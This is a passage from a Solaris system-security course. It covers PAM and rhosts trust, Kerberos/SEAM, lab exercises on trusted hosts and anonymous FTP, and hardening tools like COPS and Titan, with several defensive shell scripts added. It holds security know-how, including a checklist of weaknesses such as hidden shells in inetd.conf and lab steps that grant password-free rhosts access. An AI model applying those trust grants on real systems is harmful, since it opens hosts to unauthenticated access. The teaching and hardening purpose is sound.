Deleting the previous line prevents the /etc/hosts.equiv and $HOME/.rhosts files from being accessed during an rlogin session and prevents unauthenticated access to the local system from remote systems. All rlogin accesses require a password, regardless of the presence or contents of any $HOME/.rhosts or /etc/hosts.equiv files.

To disable the rsh service, delete the line:

rsh auth required /usr/lib/security/$ISA/pam_rhosts_auth.so.1

Deleting this line stops unauthenticated access to the $HOME/.rhosts file.

In practice, you should stop the remote services from running by commenting out the following lines in the /etc/inetd.conf file:

shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind

Users can use the telnet command as an alternative to the rlogin command.

Initiating PAM Error Reporting

You can configure the PAM error reporting mechanism to:

● Display alert messages on the console

● Mail critical messages to the root user

● Append informational and debug messages to the /var/log/pamlog file

● Report errors using the Syslog utility

● Use auth as the Syslog facility label

To configure PAM error reporting, follow these steps:

1. Add the following PAM error reporting entries to the /etc/syslog.conf file:

a. auth.alert /dev/console

b. auth.crit "root"

c. auth.info;auth.debug /var/log/pamlog

2. Create the log file.

# touch /var/log/pamlog; chmod 600 /var/log/pamlog

3. Restart the syslog daemon or send the daemon a SIGHUP signal to activate the PAM error reporting.

# /etc/init.d/syslog stop
Stopping the syslog service.
# /etc/init.d/syslog start
syslog service starting.

Each line in the pamlog file contains a time stamp, the name of the system that generated the message, and the message itself.

Note – The pamlog file can become very large as large amounts of information are logged.

Sun Enterprise Authentication Mechanism (SEAM)

SEAM is a client–server authentication mechanism based on Kerberos 5. SEAM is a single sign-on system which authenticates the user once and then grants access to authorized network resources automatically. SEAM does not transmit unencrypted passwords across the network.

Enhancing Security Using Kerberos v5

In 1983, the Massachusetts Institute of Technology (MIT), IBM, and Digital Equipment Corporation began work on the Athena Project to develop an integrated network environment for the university campus. The Athena Project developed a solution called Kerberos to solve the security problems of working with insecure computers (PCs running MS-DOS) and an open network susceptible to sniffing attacks.


Kerberos is an authentication system which uses Data Encryption Standard (DES) cryptography to protect sensitive information such as passwords on an open network. When a user logs onto a system running Kerberos, the user is issued a ticket supplied by the Kerberos Authentication server. The ticket can only be decrypted with the user’s password and contains information necessary to obtain additional tickets. From that point, whenever the user wants to access a network service, a valid ticket must be presented. These tickets are obtained from the Kerberos server. All of the information in a Kerberos ticket is encrypted before it is transmitted over the network.

The Kerberos server stores the user name and password information locally. Passwords are never transmitted over the network. Unlike UNIX, Kerberos uses a reversible encryption algorithm (DES), so passwords can be decrypted when they are required. Allowing the passwords to be decrypted is a weakness in the system because the Kerberos server must be secure and invulnerable to attack. An intruder that breaks in to the Kerberos server has access to all of the passwords on the network. Kerberos was developed before public key encryption such as RSA (Rivest Shamir Adleman, the professors who developed the RSA algorithm) and Diffie Hellman algorithms were publicly available.


Logging in Using Kerberos v5

Users logging in to a Kerberos protected system enter their user names and passwords as usual. The system contacts the Kerberos Authentication server, sending a data packet with the user name and the current system time encrypted with the user’s password. If the Kerberos server can decrypt the time in the user’s data packet, it returns a ticket-granting-ticket, encrypted with the user’s password. The user’s system can now contact the Kerberos ticket granting server to obtain tickets for access to network services.


Kerberos Features

Kerberos contains the following features:

● Passwords are only stored on the Kerberos server.

● The user’s password is never transmitted across the network.

● The Kerberos Authentication server can validate the user’s identity because it stores the user’s password. Part of the Kerberos system setup requires that the user’s password be stored on the Kerberos server.


● The user can validate the Kerberos server’s identity because it knows the user’s password.

● Network sniffing can only pick up encrypted Kerberos data packets or tickets.

Note – Encrypted Kerberos packets have a well-known data format and are more susceptible to decrypting than a packet whose plain text is entirely unknown. Kerberos tickets have a limited lifetime. Kerberos tickets expire and new versions must be issued. The lifetime of a Kerberos ticket is less than the time it currently requires to break the encryption using brute force techniques.


Understanding Kerberos Limitations

Kerberos is a good solution to a difficult problem but it has the following limitations:

● Using Kerberos is not transparent. Every network service (for example login) requires modifications to use the mechanism.

● Kerberos does not work well with multi-user systems. Kerberos was designed for single-user workstations and stores tickets in the /tmp directory. These tickets can be stolen and used for fraudulent access to the network services.


● The Kerberos Authentication server is a weak point. Special care must be taken to ensure the security and integrity of this system.

● The Kerberos Authentication server must be continuously available. Therefore, it is a single point of failure.

● Kerberos stores all DES encrypted passwords using a single key which is stored on the hard disk of the Authentication server. If the Authentication server is ever compromised, all network passwords must be changed.


Configuring SEAM Clients

To configure a SEAM client, you must modify the PAM configuration files. You must enhance the standard /etc/pam.conf configuration to include the Kerberos authentication module /usr/lib/security/pam_krb5.so.1 for every service that requires SEAM.

The standard PAM configuration file contains the required lines for this configuration, therefore you only need to uncomment the appropriate lines. The Solaris AnswerBook includes step-by-step instructions for configuring SEAM.


Uncomment the lines shown in Code 13-5 in the standard /etc/pam.conf file to use the SEAM Kerberos authentication modules.

Code 13-5 Using SEAM Kerberos Authentication Modules

rlogin   auth     optional /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass
login    auth     optional /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass
dtlogin  auth     optional /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass
other    auth     optional /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass
#
dtlogin  account  optional /usr/lib/security/$ISA/pam_krb5.so.1
other    account  optional /usr/lib/security/$ISA/pam_krb5.so.1
other    session  optional /usr/lib/security/$ISA/pam_krb5.so.1
other    password optional /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass

To use SEAM across your network, you must install a SEAM (Kerberos) server. The SEAM server is available under license from Sun Microsystems (see http://www.sun.com/solaris/ds/ds-seam.html).


Exercise: Securing Network Services

In this exercise, you complete the following tasks:

● Disable some network services

● Configure trusted hosts

● Disable trusted host configuration files using PAM

● Set up Anonymous FTP

Preparation

Ensure that you know the host name of your workstation and identify a nearby colleague who you will work with to test and secure each other’s network services.

Tasks

Although these tasks are written for people working in pairs, you can work through the questions alone by configuring and testing your own workstation.

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Disabling Network Services

To disable Network Services:

1. Verify that you can run the finger command to find out who is logged in to your colleague’s system. For example:

# finger @otherhost


2. Run finger for one of the users to get further details about that user on the other workstation. Use the command format below, otherwise you will not use the network finger command but a local version which gets details of users on your workstation.

# finger user@otherhost

You can always prime the data by using the telnet command to log in to the system as the user alice, bob, or eve.

3. Ensure that your colleague can run the same commands on your system.

4. Both of you should now disable the finger service in /etc/inetd.conf and verify that you can no longer run the finger command to obtain data from your colleague’s workstation.

Task – Understanding Trusted Hosts

1. Look at the three example trusted hosts files shown in Code 13-6.

Code 13-6 Trusted Hosts Files

# hostname
wallace
# more /etc/hosts.equiv
grommit
# more /.rhosts
penguin
# more /export/home/alice/.rhosts
penguin
sean awonder

2. Answer the following questions:

a. Can the root user on grommit copy files to and from wallace?

b. Can user alice on grommit run commands on wallace?

c. Can user alice on penguin run commands on wallace?

d. Can the root user on wallace copy files to and from penguin?

e. Can user awonder on sean run commands on wallace?

f. Can the root user on grommit log in to wallace?


Task – Configuring Trusted Hosts

Working with your partner, set up your systems so that the root user and the user alice (but no other user) can run remote commands and copy files remotely.

Task – Disabling Trusted Hosts

Working with your partner, configure PAM so that the rsh and rcp commands cannot be used and configure the rlogin command so that it always requires a password from the remote user.

Task – Configuring Anonymous FTP

Read the manual page for the in.ftpd daemon and follow the instructions to configure Anonymous FTP (the manual page includes a shell script which automates the entire process).

Extract the shell script from the manual page by redirecting the output from the man command to a text file and editing out the non-shell script information.

For example:

# man in.ftpd >ftp.sh


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following paragraphs describe the Solaris OE commands necessary to solve the problems posed in the exercises for this module.

Disabling Network Services

Edit the /etc/inetd.conf file and comment out the following line:

#finger stream tcp6 nowait nobody /usr/sbin/in.fingerd in.fingerd

Send the hang-up signal to the inetd process (get the process ID from the ps listing):

# ps -ef | grep inetd
# kill -HUP pid

The finger command should now fail with a connection refused error message.

Understanding Trusted Hosts

Answers to the questions:

a. Can the root user on grommit copy files to and from wallace?

No. hosts.equiv grants access to all users on grommit except the root user and the file /.rhosts does not list grommit as a trusted host.

b. Can user alice on grommit run commands on wallace?

Yes. hosts.equiv grants access to all users on grommit except root.

c. Can user alice on penguin run commands on wallace?

Yes. While hosts.equiv does not grant access to users on penguin, the .rhosts file of user alice does list penguin.

d. Can the root user on wallace copy files to and from penguin?

Unknown. The trusted hosts files on penguin control access to penguin, and these have not been shown.


e. Can user awonder on sean run commands on wallace?

Yes, as long as the -l option is used. The .rhosts file of user alice does list the host sean and the user awonder, but the command must be run as user alice. For example:

# rsh -l alice wallace ls -l

f. Can the root user on grommit log in to wallace?

Yes, but a password is required. The trusted host files do not allow the rcp or rsh commands to run but will not stop the rlogin command. A valid password must be supplied.
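The trusted-host rules that the answers above rely on, as an added example that is not part of the course: a small Bourne shell model of how the rsh and rcp check reads /etc/hosts.equiv and the target user’s .rhosts file. The three files from Code 13-6 are embedded as constructed strings, and the helper names (line_grants, rhosts_of, is_trusted) are assumptions. The model covers only the plain "host" and "host user" line forms; the real check also understands "+", "-" and netgroup entries, and rlogin falls back to a password prompt when the check fails (question f), which the model does not show.

```shell
#!/bin/sh
# Added example (not from the course): a model of the rsh/rcp trusted-host
# check applied to the files of Code 13-6. Helper names are assumptions.

# The three files on wallace, as constructed strings copied from Code 13-6.
HOSTS_EQUIV='grommit'
ROOT_RHOSTS='penguin'
ALICE_RHOSTS='penguin
sean awonder'

# rhosts_of USER: print the .rhosts contents of a local user (only alice has one).
rhosts_of() {
    case "$1" in
        alice) printf '%s\n' "$ALICE_RHOSTS" ;;
        *)     : ;;
    esac
}

# line_grants CONTENT RHOST RUSER LUSER: succeed if some line of CONTENT lets
# RUSER on RHOST act as local user LUSER. A bare host name trusts only the
# same user name; "host user" trusts that remote user as any local user.
line_grants() {
    printf '%s\n' "$1" | {
        while read -r host user; do
            case "$host" in ''|'#'*) continue ;; esac
            [ "$host" = "$2" ] || continue
            if [ -z "$user" ]; then
                [ "$3" = "$4" ] && exit 0
            else
                [ "$user" = "$3" ] && exit 0
            fi
        done
        exit 1
    }
}

# is_trusted RHOST RUSER LUSER: succeed when rsh/rcp from RUSER@RHOST would be
# accepted as LUSER without a password. /etc/hosts.equiv is never consulted
# for the root account, which is governed by /.rhosts alone.
is_trusted() {
    if [ "$3" = root ]; then
        line_grants "$ROOT_RHOSTS" "$1" "$2" "$3"
        return $?
    fi
    if line_grants "$HOSTS_EQUIV" "$1" "$2" "$3"; then
        return 0
    fi
    line_grants "$(rhosts_of "$3")" "$1" "$2" "$3"
}

# Questions a, b, c and e from the exercise, plus two cases that must be refused.
for q in "grommit root root" "grommit alice alice" "penguin alice alice" \
         "sean awonder alice" "sean awonder awonder" "grommit bob alice"; do
    set -- $q
    if is_trusted "$1" "$2" "$3"; then
        echo "$2@$1 as $3: trusted, no password asked"
    else
        echo "$2@$1 as $3: not trusted (rlogin would ask for a password)"
    fi
done
```

The two refused cases are the ones worth remembering when reviewing these files: a "host user" line in alice’s .rhosts lets awonder in only as alice, not as himself, and a bare host name in hosts.equiv never lets one user act as a different one.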

Configuring Trusted Hosts

Identify the host name of your colleague’s system. For the purposes of this solution this is otherhost. To grant root access to otherhost add a line to your /.rhosts file:

# cat >>/.rhosts
otherhost
^D

To grant access to user alice, do the same thing to alice’s .rhosts file (make sure alice owns the .rhosts file).

# su - alice
$ cat >>~/.rhosts
otherhost
^D
$ exit

Your colleague must do the same but must specify your host name instead of otherhost.

The rsh and rcp commands now work as required.


Disabling Trusted Hosts

Edit the /etc/pam.conf file and comment out the rlogin and rsh lines which refer to the pam_rhosts_auth.so.1 authentication module. Make sure that rlogin still has the pam_unix.so.1 module defined or rlogin does not prompt for a password. For example:

# rlogin auth sufficient /usr/lib/security/$ISA/pam_rhosts_auth.so.1
rlogin auth required /usr/lib/security/$ISA/pam_unix.so.1

# rsh auth required /usr/lib/security/$ISA/pam_rhosts_auth.so.1

The rsh and rcp commands no longer work and rlogin always prompts for a password.

Note – On a live system you would disable the rsh and rlogin network services by editing /etc/inetd.conf rather than removing the authentication modules. However, if your users want to use the rlogin service rather than the telnet service, then disabling the trusted hosts files for the rlogin service is a sensible precaution.
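The edit described above, as an added example that is not the course’s own: a Bourne shell function that comments out every active pam_rhosts_auth.so.1 line in a pam.conf file, but only after confirming that an rlogin auth entry with pam_unix.so.1 remains, so the change cannot leave rlogin with no authentication module at all. The pam.conf fragment is constructed, and the helper names (active_rhosts_lines, rlogin_has_unix, disable_rhosts_auth, harden_pam_conf) are assumptions.

```shell
#!/bin/sh
# Added example (not from the course): disable rhosts authentication in a
# pam.conf file safely. Helper names are assumptions of this example.

# Constructed fragment of a Solaris 8 pam.conf, before the change.
SAMPLE_PAM_CONF='# pam.conf fragment (constructed)
rlogin  auth sufficient  /usr/lib/security/$ISA/pam_rhosts_auth.so.1
rlogin  auth required    /usr/lib/security/$ISA/pam_unix.so.1
rsh     auth required    /usr/lib/security/$ISA/pam_rhosts_auth.so.1
login   auth required    /usr/lib/security/$ISA/pam_unix.so.1'

# active_rhosts_lines FILE: print how many uncommented lines load pam_rhosts_auth.
active_rhosts_lines() {
    n=$(grep -v '^[[:space:]]*#' "$1" | grep -c 'pam_rhosts_auth\.so\.1' || true)
    echo "$n"
}

# rlogin_has_unix FILE: succeed if an active "rlogin auth" line loads pam_unix.
rlogin_has_unix() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -q '^rlogin[[:space:]][[:space:]]*auth[[:space:]].*pam_unix\.so\.1'
}

# disable_rhosts_auth FILE: comment out every active pam_rhosts_auth line
# (comments are left alone, so the change is idempotent). Prints the count.
disable_rhosts_auth() {
    before=$(active_rhosts_lines "$1")
    sed -e '/^[[:space:]]*#/b' \
        -e '/pam_rhosts_auth\.so\.1/s/^/# /' "$1" >"$1.new" && mv "$1.new" "$1"
    echo "$before"
}

# harden_pam_conf FILE: refuse to touch FILE unless rlogin keeps pam_unix;
# otherwise removing pam_rhosts_auth would leave rlogin with no auth module.
harden_pam_conf() {
    if ! rlogin_has_unix "$1"; then
        echo "refusing: no active rlogin auth line with pam_unix.so.1 in $1" >&2
        return 1
    fi
    disable_rhosts_auth "$1"
}

# Demonstration on a temporary copy; /etc/pam.conf itself is never edited here.
demo=$(mktemp)
printf '%s\n' "$SAMPLE_PAM_CONF" >"$demo"
echo "commented out $(harden_pam_conf "$demo") pam_rhosts_auth line(s):"
cat "$demo"
rm -f "$demo"
```

The refusal path is the check the text asks you to make by hand: a pam.conf in which rlogin has only the rhosts module would, after this edit, have no auth module for rlogin at all, so the script stops rather than producing that state.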

Configuring Anonymous FTP

1. Create a user called ftp whose home directory is the Anonymous ftp area. This user should be in a separate group from all other users and should not have a valid login shell. Use the commands:

# groupadd -g 30000 ftp
# useradd -u 30000 -g 30000 -c "Anonymous FTP" -s /usr/bin/false \
    -d /export/anon ftp

2. The ftp user should not have a valid password. The default password is *LK*, which has locked the account from login. You might want to edit the /etc/shadow file and set the password to NP to show that this account is never used.

3. Extract the “make Anonymous FTP” script from the in.ftpd manual pages as shown in “Task – Configuring Anonymous FTP” on page 13-53. If you want, run the following sed command which extracts the script automatically (be sure to enter the script exactly as shown):

# man in.ftpd | sed -n '{
> s/^[ ]*//
> /^$/d
> /^SunOS/d
> /^Maintenance/d
> /^#!/,/^#chmod 1755 ${ftphome}\/pub/p
> }' >mkftp

4. Make the script executable using:

# chmod +x mkftp

5. Execute this script:

# ./mkftp

This script obtains the Anonymous FTP directory from the ftp user’s entry in the /etc/passwd file and copies in all the required programs, libraries, and device files.

6. Test your Anonymous FTP account by running FTP to connect to your workstation and log in as anonymous (use any password):

# ftp localhost
Connected to 192.168.1.2.
220 wallace FTP server (SunOS 5.8) ready.
User (192.168.0.250:(none)): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.1,1057) (0 bytes).
bin
dev
etc
local.cshrc
local.login
local.profile
pub
usr
226 ASCII Transfer complete.
ftp: 66 bytes received in 0.22Seconds 0.30Kbytes/sec.
ftp>
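As an added example (not from the course), a Bourne shell check that the ftp account created in steps 1 and 2 has the expected shape: no usable login shell, a locked password field (*LK* or NP), and a group shared with no other account. The passwd and shadow text is constructed, and check_ftp_account is an assumption of this example, not part of the in.ftpd script.

```shell
#!/bin/sh
# Added example (not from the course): sanity-check the anonymous FTP account
# against constructed passwd/shadow text. Helper names are assumptions.

# Constructed inputs: a correct account and one with three common mistakes.
PASSWD_OK='root:x:0:1:Super-User:/:/sbin/sh
alice:x:1001:10:Alice:/export/home/alice:/bin/ksh
ftp:x:30000:30000:Anonymous FTP:/export/anon:/usr/bin/false'
SHADOW_OK='root:abcdefghijklm:6445::::::
alice:nopqrstuvwxyz:6445::::::
ftp:*LK*:6445::::::'

PASSWD_BAD='root:x:0:1:Super-User:/:/sbin/sh
ftp:x:30000:30000:Anonymous FTP:/export/anon:/bin/sh
bob:x:1002:30000:Bob:/export/home/bob:/bin/ksh'
SHADOW_BAD='root:abcdefghijklm:6445::::::
ftp:abcdefghijklm:6445::::::
bob:nopqrstuvwxyz:6445::::::'

# check_ftp_account PASSWD_TEXT SHADOW_TEXT: prints one line per finding and
# returns the number of findings (0 means the account matches the solution).
check_ftp_account() {
    passwd_text=$1
    shadow_text=$2
    problems=0

    entry=$(printf '%s\n' "$passwd_text" | grep '^ftp:' || true)
    if [ -z "$entry" ]; then
        echo "no ftp account in passwd"
        return 1
    fi
    oldifs=$IFS
    IFS=:
    set -- $entry
    IFS=$oldifs
    ftp_gid=$4
    ftp_shell=$7

    # 1. The account must not have a working shell.
    case "$ftp_shell" in
        /usr/bin/false|/bin/false|/usr/sbin/noshell) ;;
        *) echo "ftp has a usable shell: $ftp_shell"; problems=$((problems + 1)) ;;
    esac

    # 2. The ftp group must not be shared with any other account.
    sharers=$(printf '%s\n' "$passwd_text" |
        while IFS=: read -r name _ _ gid _; do
            [ "$name" != ftp ] && [ "$gid" = "$ftp_gid" ] && echo "$name"
        done; true)
    if [ -n "$sharers" ]; then
        echo "group $ftp_gid is shared with: $sharers"
        problems=$((problems + 1))
    fi

    # 3. The password field must be locked (*LK*) or marked NP.
    pwfield=$(printf '%s\n' "$shadow_text" | grep '^ftp:' | cut -d: -f2)
    case "$pwfield" in
        '*LK*'|NP) ;;
        *) echo "ftp password field is '$pwfield', expected *LK* or NP"; problems=$((problems + 1)) ;;
    esac

    return $problems
}

echo "== correct account =="
check_ftp_account "$PASSWD_OK" "$SHADOW_OK" && echo "no findings"
echo "== misconfigured account =="
check_ftp_account "$PASSWD_BAD" "$SHADOW_BAD" || echo "findings: $?"
```

On a real system the two inputs would be "$(cat /etc/passwd)" and "$(cat /etc/shadow)", run as root; the function reads only the ftp entries and the group column, so it is safe to keep in a post-installation script.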


Module 14

Hardening the System

Objectives

Upon completion of this module, you should be able to:

● List at least two reasons for hardening a system

● Describe the role of Titan in a secure system

● Install and configure Titan

● Write a Titan module

● Configure and use the Automated Security Enhancement Tool (ASET)


Relevance


Discussion – The following questions are relevant to understanding the role of system hardening:

● Do your default file system permissions provide a secure installation?

● Are all your user accounts configured in a secure manner?

● Have you secured all of your system’s network services?

● Do you need to apply the same changes to multiple systems?

● Can you automate any of these standard security measures?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Online Manual pages for aset(1).

● Solaris OE AnswerBook 2.

● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & Internet Security. O’Reilly & Associates, Inc. 1996.

● Frisch, Aeleen. System Administration. 2nd Ed, O’Reilly & Associates, Inc. 1995.

● Solaris OE Security Toolkit; [http://www.sun.com/security/jass]

● Solaris Operating Environment Whitepapers on Security; [http://www.sun.com/blueprints/1299/minimization.pdf] [http://www.sun.com/blueprints/1299/network.pdf] [http://www.sun.com/blueprints/0100/security.pdf] [http://www.sun.com/blueprints/tools]

● COPS online resources; [ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops]

● Tiger online resources; [ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/tiger]

● Titan online resources; [http://www.fish.com/titan/]


System Hardening

The goal of system hardening is to install the Solaris OE so that it provides good host security from the outset without you spending hours making security modifications. You can harden the system by using shell scripts or Perl scripts which are run immediately after installation of a new workstation or server, or are included as part of a JumpStart™ configuration.

Hardening involves one or more of the following steps:

● Checking file permissions, ownerships, and digests

● Checking for user, group, and password insecurities

● Checking network services for secure configurations

● Performing any other checks the tool provider considers useful

Some tools only report on potential problems, while others actually secure the host system.


Commonly Available Hardening Tools

Several freeware tools are available to help with system hardening.

The following sections discuss these tools.


COPS

Computer, Oracle, and Password System (COPS) is a set of programs that attempts to automate security checks often performed manually (or perhaps with self-written short shell scripts or programs) by a system administrator.

COPS does not correct problems, but instead issues a report for the administrator. COPS runs on most major UNIX platforms and is not specific to the Solaris OE.

COPS checks and reports on the following:

● File, directory, and device permissions and modes.

● Poor passwords.

● Content, format, and security of password and group files.

● The programs and files run in /etc/rc* and crontab files.

● The existence of root SUID (set-user-ID) files, their writability, and whether they are shell scripts.


● A cyclic-redundancy-check (CRC) against important binaries or key files to report any changes therein.

● Writability of user’s home directories and startup files (.profile, .cshrc, and so on).

● Anonymous FTP setup.

● Insecure network configuration, including:

● Unrestricted TFTP

● Decode alias in the sendmail program

● SUID uudecode problems

● Hidden shells inside inetd.conf

● The rexd daemon running in inetd.conf

● Miscellaneous root checks, such as:

● Current directory in the search path

● A “+” in the /etc/host.equiv file

● Unrestricted NFS mounts.

● Ensuring that the root user is in the /etc/ftpusers file

● Dates of Computer Emergency Response Team (CERT) advisories in comparison with key files. This checks the dates that various bugs and security holes were reported by CERT against the actual date on the file in question.

● The Kuang expert system. This takes a set of rules and tries to determine if your system can be compromised.


Tiger

Tiger is a set of scripts that scan a UNIX system looking for security problems in the same way as COPS. Tiger was originally developed to check UNIX systems on the Texas A&M University campus that needed to be accessed from off campus.

The primary purpose of many of the Tiger checks is to protect the superuser account, and the philosophy behind Tiger is that any other account or any group can be attacked and breached. Tiger’s goal is to protect the root user from all accounts, even system accounts.


Solaris Security Toolkit

Sun's Enterprise Engineering and Professional Services organizations developed the Solaris Security Toolkit (formerly JumpStart™ Architecture and Security Scripts [JASS] Toolkit) to harden, minimize, and secure Solaris OE systems. The Toolkit simplifies and automates the process of securing Solaris OE systems. The Toolkit can be used through the JumpStart program or in a standalone mode.

The Toolkit is a set of scripts and files that automatically harden Solaris OE systems. The security enhancements contained in the Toolkit are based on recommendations made in Sun BluePrint™ Online articles:

● Solaris Operating Environment Minimization for Security, http://www.sun.com/blueprints/1299/minimization.pdf

● Solaris Operating Environment Network Settings for Security, http://www.sun.com/blueprints/1299/network.pdf

● Solaris Operating Environment Security, http://www.sun.com/blueprints/0100/security.pdf


Use the JASS Toolkit to execute these scripts from a JumpStart server at the time of installation. You can also use the Toolkit directly from the command line to secure existing systems. The Toolkit can be run multiple times on the same client and can perform the same tasks with no adverse effects, which allows you to schedule the scripts on a regular basis using the cron utility or after applying operating system patches.

Titan

Titan is discussed in detail in “Using Titan” on page 14-11. It is a free, host-based security tool that can improve or audit the security of a UNIX system. It can fix or detect potential security problems.

ASET

Automated Security Enhancement Tool (ASET) is a standard Solaris OE utility which reports and potentially corrects a number of security problems. ASET is discussed in detail in “Enhancing System Security Using ASET” on page 14-26.


Using Titan

Titan is a collection of programs which fixes or tightens security problems in the setup or configuration of a UNIX system. Titan was created by Brad Powell of Sun Microsystems. Titan is written in Bourne shell and its modular design allows anyone who can write a shell script or program to add to it.

Titan automates the process of tightening up the operating system security (its name is a pun on the word tighten). Titan is not a replacement for other tools, but it helps simplify some security measures.

Titan does not duplicate much of the functionality of COPS and Tiger, so use it in conjunction with these tools to provide a strong toolset for hardening file systems.

Although Titan was developed primarily for the Solaris OE, it is also available for SuSE and Redhat versions of Linux.


Titan Design Goals

Titan is a system hardening and intruder detection tool. Its design goals are:

● After running Titan, the system should be more secure than before.

● Titan’s actions produce a consistent and understandably secure system.

● Titan allows the administrator to control what Titan modules to run. Because Titan is flexible and you have the full source code, you can remove unwanted security fixes.

● Titan is easily extended. You can place shell scripts or other programs into Titan's framework, and they run alongside all the other programs.

Titan does not attempt to fix all security issues. For example it does not:

● Fix software or script bugs

● Check for poor passwords

● Install patches

● Check for COPS, Tiger, or SAINT-like problems

Titan is not meant to be run once and forgotten, but should be used as part of a regular process of sweeping the system for traces of successful break-ins.

System administrators concerned about security should have considered, if not resolved or fixed, many of the problems that Titan covers. Titan helps you because it is systematic. You do not need to wonder if you finished applying all your changes. Run Titan in verify mode and it reports on all the things that Titan thinks need hardening.


Using Titan Modules

Titan is built around a large number of modules (more than sixty), each of which focuses on reporting and fixing a particular security problem. Titan modules have a defined structure to make it easy for you to write your own modules.

You can use Titan to run some or all of the modules by editing a configuration script. Sample configuration scripts for workstations and servers are included in the Titan package. Not all of the Titan modules should run on all systems.
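The verify/fix split described above, as an added example that is not part of Titan or of the course: a small Bourne shell module in Titan’s style that does what Table 14-1 says the passwd.sh module does, reporting accounts whose password field is empty in verify mode and locking them with "*" in fix mode. The -i, -v and -f option letters and the SHADOW_FILE override are assumptions made so that the script can be run against a constructed copy rather than the live /etc/shadow.

```shell
#!/bin/sh
# Added example (not Titan's own code): a passwd.sh-style module with
# verify (-v) and fix (-f) modes. SHADOW_FILE may be overridden so the
# script can run against a constructed copy; option letters are assumptions.

SHADOW_FILE=${SHADOW_FILE:-/etc/shadow}

# blank_password_accounts FILE: print the names whose password field is empty.
blank_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# verify_shadow FILE: succeed only if no account has an empty password field.
verify_shadow() {
    bad=$(blank_password_accounts "$1")
    if [ -z "$bad" ]; then
        echo "PASS: every account in $1 has a password field"
        return 0
    fi
    echo "FAIL: empty password field for:" $bad
    return 1
}

# fix_shadow FIL    E: lock empty password fields with "*", keeping a backup and
# the original file's ownership and mode. Prints how many entries changed.
fix_shadow() {
    n=$(blank_password_accounts "$1" | wc -l | tr -d ' ')
    if [ "$n" -gt 0 ]; then
        cp -p "$1" "$1.titan.bak"
        awk -F: 'BEGIN { OFS = ":" } $2 == "" { $2 = "*" } { print }' "$1" >"$1.new"
        cat "$1.new" >"$1" && rm -f "$1.new"
    fi
    echo "$n"
}

# Entry point in Titan's style: -i describes the module, -v reports, -f fixes.
titan_module() {
    case "$1" in
        -i) echo "passwd.sh-style: accounts with empty password fields" ;;
        -v) verify_shadow "$SHADOW_FILE" ;;
        -f) changed=$(fix_shadow "$SHADOW_FILE")
            echo "locked $changed account(s) in $SHADOW_FILE"
            verify_shadow "$SHADOW_FILE" ;;
        *)  echo "usage: $0 -i | -v | -f" >&2; return 2 ;;
    esac
}

# Demonstration on a constructed shadow copy; the live file is not touched.
demo=$(mktemp)
printf 'root:abcdefghijklm:6445::::::\nguest::6445::::::\nftp:*LK*:6445::::::\n' >"$demo"
SHADOW_FILE=$demo
titan_module -v || true      # reports guest
titan_module -f              # locks guest, then verifies
rm -f "$demo" "$demo.titan.bak"
```

Writing the file with cat rather than mv keeps the owner and the 400 mode of /etc/shadow, and the backup lets the change be undone; both are the kind of detail a module must get right before it is added to a Titan configuration that runs on every system.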


Table 14-1 describes some of the modules that can be run on a system (a full list of the modules is included in the Titan documentation).

Table 14-1 Some Titan Modules

Module                 Usage

add-umask.sh           Adds a system-wide umask for rc?.d files which causes the system daemons to create more secure files.

bsm.sh                 Verifies that the Basic Security Module (BSM) is enabled. It configures auditing events by modifying the /etc/security/audit_control file.

create-issue.sh        Creates the /etc/issue banner displayed at login time.

cronset.sh             Checks or fixes CRONLOG=YES in the /etc/default/cron file, rotates the cron log files at 2 Mbytes, and changes the cron permissions.

decode.sh              Looks for any “|” characters in the /etc/aliases file and fixes them.

defloginparams.sh      Resets the /etc/default/login file parameters to a stricter mode.

defpwparams.sh         Resets the /etc/default/password file parameters to a stricter mode.

disable-accounts.sh    Disables system accounts like bin and daemon and creates a /usr/sbin/noshell script.

disable-ping-echo.sh   Disables the ip_respond_to_echo_broadcast service so that specific ping crashes (from Smurf attacks) do not work. It also hides the system from some network probe agents that use a broadcast ping command to discover host names.

file-own.sh            Changes system files (mainly in the /usr directory) to be owned by the root user.


fix-cronpath.sh Changes the permission and ownership of items that run out of the root user’s cron utility. This prevents a new Trojan horse or SUID root files from being created when the cron utility is run.

fix-modes.sh Fixes all the mode 775 directories and binaries, and changes the ownership to the root user where needed.

ftp-2.6_secure.sh Works with the Solaris 2.6 Operating Environment and newer versions of the in.ftpd daemon. It adds UMASK=077 to the /etc/default/ftpd file, and creates a short FTP login warning message by creating the /etc/ftp-banner file.

hosts.equiv.sh Checks for a /etc/hosts.equiv file.

inetd.sh Changes the /etc/inetd.conf file and turns off most of the services.

loginlog.sh Fixes the syntax so that log entries are created for failed login attempts.

lpsched.sh Disables the lp command. This module is for firewalls and non-print servers.

nddconfig.sh Creates the /etc/rc2.d/S70nddconfig file and sets all the kernel network modules that are concerned with security.

nuke-sendmail.sh Disables the sendmail program. You should use this module on firewalls that are not sendmail servers, servers that are not sendmail servers, and all desktops that have their mail delivered to a server.


Caution – If you do not have a root password set, then the previous Titan module disables root logins, too.

pam-rhosts-2.6.sh Modifies the /etc/pam.conf file by removing the following line so that the PAM system does not allow rhosts commands:

rlogin auth sufficient /usr/lib/security/pam_rhosts_auth.so.1

passwd.sh Checks that all accounts have passwords and adds a “*” to blank password fields (if run in fix mode).

psfix.sh Creates the /etc/rc3.d/S79tmpfix file so that upon boot the /tmp directory always has the sticky bit set (mode 1777).

rootchk.sh Checks root’s path and makes sure that the root user owns the directories and binaries in the root user’s path. Removes the “.” from the path.

syslog.sh Modifies the /etc/syslog.conf file so that console messages are saved to system log files.

